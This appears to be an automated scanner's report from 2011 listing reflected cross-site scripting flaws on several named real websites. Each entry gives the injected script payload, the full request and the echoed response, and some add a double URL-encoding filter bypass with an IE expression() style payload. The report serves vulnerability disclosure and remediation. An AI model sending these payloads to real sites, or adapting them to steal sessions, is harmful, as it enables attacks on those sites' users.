This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a93c"><script>alert(1)</script>9c6c852bf29 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93eb"><script>alert(1)</script>6b83a8f7561 was submitted in the action parameter. This input was echoed as c93eb\"><script>alert(1)</script>6b83a8f7561 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.38. http://store.mandriva.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://store.mandriva.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af4a"><script>alert(1)</script>8d27ed95a34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1af4a"><script>alert(1)</script>8d27ed95a34=1 HTTP/1.1 Host: store.mandriva.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,26271 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a71"><script>alert(1)</script>b9f1f9d6353d18760 was submitted in the action parameter. This input was echoed as 70a71\"><script>alert(1)</script>b9f1f9d6353d18760 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
3.40. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://store.mandriva.com
Path:
/product_info.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b33"><script>alert(1)</script>3a01f5b1865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.41. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://store.mandriva.com
Path:
/product_info.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4974"><script>alert(1)</script>0d8cba98511d21e95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4974\"><script>alert(1)</script>0d8cba98511d21e95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the products_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef39"><script>alert(1)</script>4f532f5a012 was submitted in the products_id parameter. This input was echoed as 7ef39\"><script>alert(1)</script>4f532f5a012 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9b123<script>alert(1)</script>57ab9101622 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json?optionalProperties=Channel.url%2CChannel.logoIMG%2CEvent.url&order=startDateTime&batchSize=2&batch=0&callback=jsonp_16787609b123<script>alert(1)</script>57ab9101622 HTTP/1.1 Host: tvgids.upc.nl Proxy-Connection: keep-alive Referer: http://www.upc.nl/upclive/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the action request parameter is copied into the HTML document as plain text between tags. The payload f5b88<script>alert(1)</script>d45944dbf30 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.45. http://www.allvoip.gr/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.allvoip.gr
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 657e2--><script>alert(1)</script>c53ac8578f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html dir="LTR" lang="el"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-7"> <meta name="title" http-e ...[SNIP]... <a href="http://allvoip.gr/products_new.php?657e2--><script>alert(1)</script>c53ac8578f5=1&op=list&action=buy_now&products_id=580&osCsid=nu0foff71uhnmo7bun7b31jg31"> ...[SNIP]...
3.46. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ekko.ws
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef5b"><script>alert(1)</script>0c5092af384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.47. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ekko.ws
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63ede<script>alert(1)</script>dcf44148064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.48. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ekko.ws
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00e5"><script>alert(1)</script>ee8ef911b0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd28"><script>alert(1)</script>3166a746867 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56495<script>alert(1)</script>e3a7c8ec4bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34900"><script>alert(1)</script>1964fc5b40d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.52. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ekko.ws
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f6ae"><script>alert(1)</script>f51bcf7e764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.53. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ekko.ws
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bc71b<script>alert(1)</script>08cfc6baade was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.54. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ekko.ws
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e3f"><script>alert(1)</script>bc79ec97915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24543%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252241aebbf9b7a was submitted in the REST URL parameter 1. This input was echoed as 24543"style="x:expr/**/ession(alert(1))"41aebbf9b7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9976%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25229fc951766a6 was submitted in the REST URL parameter 4. This input was echoed as a9976"style="x:expr/**/ession(alert(1))"9fc951766a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1586%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252277ea5a6a870 was submitted in the REST URL parameter 1. This input was echoed as d1586"style="x:expr/**/ession(alert(1))"77ea5a6a870 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b60%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25225b4ba2f362a was submitted in the REST URL parameter 2. This input was echoed as 91b60"style="x:expr/**/ession(alert(1))"5b4ba2f362a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 Not Found Connection: Keep-Alive Content-Length: 9135 Date: Sun, 15 May 2011 13:18:53 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <title>404 - Page non trouv..e</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> ...[SNIP]... <A href="mailto:Web@grics.qc.ca?subject=Page introuvable&body=Ref.: images/favicon.ico91b60"style="x:expr/**/ession(alert(1))"5b4ba2f362a"> ...[SNIP]...
3.59. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.internetnatrgovina.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3f5a6--><script>alert(1)</script>2a5a0ebd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?3f5a6--><script>alert(1)</script>2a5a0ebd0=1 HTTP/1.1 Host: www.internetnatrgovina.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,43692 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.60. http://www.internetnatrgovina.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.internetnatrgovina.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a3f"><script>alert(1)</script>8266b710003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?21a3f"><script>alert(1)</script>8266b710003=1 HTTP/1.1 Host: www.internetnatrgovina.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,43692 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8e9"><script>alert(1)</script>a551140aa99 was submitted in the Company parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:04:57 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1748
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Company VALUE="4b8e9"><script>alert(1)</script>a551140aa99" SIZE=30 MAXLENGTH=30> ...[SNIP]...
The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1c99"><script>alert(1)</script>5f38dc1c19f was submitted in the Email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:05:06 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1748
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Email VALUE="f1c99"><script>alert(1)</script>5f38dc1c19f" SIZE=30 MAXLENGTH=100> ...[SNIP]...
The value of the Name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 163d0"><script>alert(1)</script>95fd9f3ee90 was submitted in the Name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:05:02 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1748
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Name VALUE="163d0"><script>alert(1)</script>95fd9f3ee90" SIZE=30 MAXLENGTH=30> ...[SNIP]...
The value of the Phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df93c"><script>alert(1)</script>1a295be864 was submitted in the Phone parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:05:11 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1747
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Phone VALUE="df93c"><script>alert(1)</script>1a295be864" SIZE=30 MAXLENGTH=30> ...[SNIP]...
The value of the Subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bfc8"><script>alert(1)</script>c1760f9a5931297f6 was submitted in the Subject parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:05:16 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1793
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE=TEXT NAME=Subject VALUE="3bfc8"><script>alert(1)</script>c1760f9a5931297f6" SIZE=30 MAXLENGTH=50> ...[SNIP]...
The value of the WebPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 538a8"><script>alert(1)</script>541646c2d83ed52 was submitted in the WebPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:04:47 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1791
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE="HIDDEN" NAME="WebPage" VALUE="UserRoomAccessIssue538a8"><script>alert(1)</script>541646c2d83ed52"> ...[SNIP]...
The value of the webpage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3060"><script>alert(1)</script>b8786e930d9 was submitted in the webpage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:04:40 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 1787
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv ...[SNIP]... <INPUT TYPE="HIDDEN" NAME="WebPage" VALUE="UserRoomAccessIssueb3060"><script>alert(1)</script>b8786e930d9"> ...[SNIP]...
The value of the Company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3238"><script>alert(1)</script>590a7eea2a0860cbb was submitted in the Company parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:09:37 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="30" maxlength="40" name="Company" value="c3238"><script>alert(1)</script>590a7eea2a0860cbb" ID="Text7"> ...[SNIP]...
The value of the Email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28d3"><script>alert(1)</script>067b77b653664807 was submitted in the Email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:38 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28259
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="30" maxlength="100" name="Email" value="d28d3"><script>alert(1)</script>067b77b653664807" ID="Text5"> ...[SNIP]...
The value of the Email2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5024a"><script>alert(1)</script>c4dc73218bdf8135f was submitted in the Email2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:49 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" autocomplete="off" size="30" maxlength="100" name="Email2" value="5024a"><script>alert(1)</script>c4dc73218bdf8135f" ID="Text6"> ...[SNIP]...
The value of the Ext request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62da0"><script>alert(1)</script>8132e80da77b74d5d was submitted in the Ext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:27 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="6" maxlength="6" name="Ext" value="62da0"><script>alert(1)</script>8132e80da77b74d5d" ID="Text4"> ...[SNIP]...
The value of the FirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e45f"><script>alert(1)</script>002c41aa3e5422ea6 was submitted in the FirstName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:07:53 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="15" maxlength="15" name="FirstName" value="7e45f"><script>alert(1)</script>002c41aa3e5422ea6" ID="Text1"> ...[SNIP]...
The value of the LastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf78"><script>alert(1)</script>4004675a7accf1613 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:04 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="25" maxlength="25" name="LastName" value="6bf78"><script>alert(1)</script>4004675a7accf1613" ID="Text2"> ...[SNIP]...
The value of the MailboxQty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad01b"><script>alert(1)</script>f97f00b1bc61e0487 was submitted in the MailboxQty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:10:44 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="10" maxlength="10" name="MailboxQty" value="ad01b"><script>alert(1)</script>f97f00b1bc61e0487" ID="Text11"> ...[SNIP]...
The value of the Phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66eec"><script>alert(1)</script>af95af7433ec180f6 was submitted in the Phone parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:08:15 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28236
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services ...[SNIP]... <input type="text" size="20" maxlength="20" name="Phone" value="66eec"><script>alert(1)</script>af95af7433ec180f6" ID="Text3"> ...[SNIP]...
The value of the SourceDesc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0ec"><script>alert(1)</script>40e439a7c6095ec33 was submitted in the SourceDesc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:11:09 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 28260
